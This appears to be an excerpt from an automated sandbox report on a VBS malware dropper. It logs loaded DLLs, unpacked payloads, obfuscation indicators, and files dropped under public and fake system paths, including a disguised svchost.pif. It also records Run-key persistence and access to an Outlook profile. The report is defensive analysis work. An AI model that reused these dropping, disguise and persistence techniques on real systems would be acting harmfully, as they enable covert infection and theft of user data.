          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ???.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ???.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ???.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: am.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ?.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ?.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ????.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ?.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ?.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ?.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ?.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: tquery.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: spp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: spp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: spp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppwmi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: slc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppcext.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: winscard.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: devobj.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: kernel.appcore.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: uxtheme.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: mscoree.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: wldp.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: amsi.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: userenv.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: profapi.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: version.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: gpapi.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: cryptsp.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rsaenh.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: cryptbase.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: windows.storage.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rasapi32.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rasman.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rtutils.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: mswsock.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: winhttp.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: iphlpapi.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: dhcpcsvc6.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: dhcpcsvc.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: dnsapi.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: winnsi.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: rasadhlp.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: fwpuclnt.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: secur32.dll
          Source: C:\Users\Public\Libraries\fptrsiaN.pifSection loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Draft doc PI ITS15235.vbsStatic file information: File size 2262031 > 1048576
          Source: Binary string: easinvoker.pdb source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
          Source: Binary string: _.pdb source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1748492146.000000001B344000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1870177247.0000000020025000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
          Source: Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
          Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000984000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000955000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr

          Data Obfuscation

          barindex
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 6.2.fptrsiaN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 10.2.fptrsiaN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 15.2.fptrsiaN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 6.2.fptrsiaN.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 10.2.fptrsiaN.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 15.2.fptrsiaN.pif.400000.0.unpack
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");
          Source: Yara matchFile source: 1.2.x.exe.29c0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000001.1912204476.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2971941444.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2971881656.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.1837489352.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1759642161.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2971876015.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.1720780507.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
          Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
          Source: fptrsiaN.pif.1.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D3E98 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_029D3E98
          Source: x.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1a6f9e
          Source: NETUTILS.dll.1.drStatic PE information: real checksum: 0x28ece should be: 0x24de0
          Source: fptrsiaN.pif.1.drStatic PE information: real checksum: 0x0 should be: 0x1768a
          Source: Naisrtpf.PIF.1.drStatic PE information: real checksum: 0x0 should be: 0x1a6f9e
          Source: svchost.pif.1.drStatic PE information: section name: .imrsiv
          Source: svchost.pif.1.drStatic PE information: section name: .didat
          Source: NETUTILS.dll.1.drStatic PE information: section name: .xdata
          Source: NETUTILS.dll.1.drStatic PE information: section name: /4
          Source: NETUTILS.dll.1.drStatic PE information: section name: /19
          Source: NETUTILS.dll.1.drStatic PE information: section name: /31
          Source: NETUTILS.dll.1.drStatic PE information: section name: /45
          Source: NETUTILS.dll.1.drStatic PE information: section name: /57
          Source: NETUTILS.dll.1.drStatic PE information: section name: /70
          Source: NETUTILS.dll.1.drStatic PE information: section name: /81
          Source: NETUTILS.dll.1.drStatic PE information: section name: /92
          Source: ndpha.pif.7.drStatic PE information: section name: .didat
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029E62A4 push 029E630Fh; ret 1_2_029E6307
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C3240 push eax; ret 1_2_029C327C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029E60AC push 029E6125h; ret 1_2_029E611D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D6018 push 029D6050h; ret 1_2_029D6048
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D4010 push 029D4048h; ret 1_2_029D4040
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D400E push 029D4048h; ret 1_2_029D4040
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C61BE push 029C6202h; ret 1_2_029C61FA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C61C0 push 029C6202h; ret 1_2_029C61FA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029E61F8 push 029E6288h; ret 1_2_029E6280
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029E6144 push 029E61ECh; ret 1_2_029E61E4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CF678 push 029CF6C5h; ret 1_2_029CF6BD
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CF677 push 029CF6C5h; ret 1_2_029CF6BD
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D2488 push ecx; mov dword ptr [esp], edx1_2_029D248A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CC42E push 029CC696h; ret 1_2_029CC68E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CC510 push 029CC696h; ret 1_2_029CC68E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CF56C push 029CF5E2h; ret 1_2_029CF5DA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029DA8B4 push ecx; mov dword ptr [esp], edx1_2_029DA8B9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029DA918 push ecx; mov dword ptr [esp], edx1_2_029DA91D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CBE90 push ecx; mov dword ptr [esp], edx1_2_029CBE95
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CCEF8 pushad ; iretd 1_2_029CCEF9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CCE58 push 029CCE84h; ret 1_2_029CCE7C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D2F54 push 029D2FFFh; ret 1_2_029D2FF7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D2F52 push 029D2FFFh; ret 1_2_029D2FF7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029E5C20 push 029E5DFCh; ret 1_2_029E5DF4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D3DB8 push 029D3DFAh; ret 1_2_029D3DF2
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C5DF4 push 029C5E4Fh; ret 1_2_029C5E47
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C5DF2 push 029C5E4Fh; ret 1_2_029C5E47
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00423149 push eax; ret 6_2_00423179
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004231C8 push eax; ret 6_2_00423179
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\fptrsiaN.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
          Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Naisrtpf.PIFJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\fptrsiaN.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to dropped file
          Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Naisrtpf.PIFJump to dropped file
          Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to dropped file

          Boot Survival

          barindex
          Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NaisrtpfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NaisrtpfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D6490 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_029D6490
          Source: C:\Users\Public\Libraries\fptrsiaN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\Public\Libraries\fptrsiaN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\Public\Libraries\fptrsiaN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\Public\Libraries\fptrsiaN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
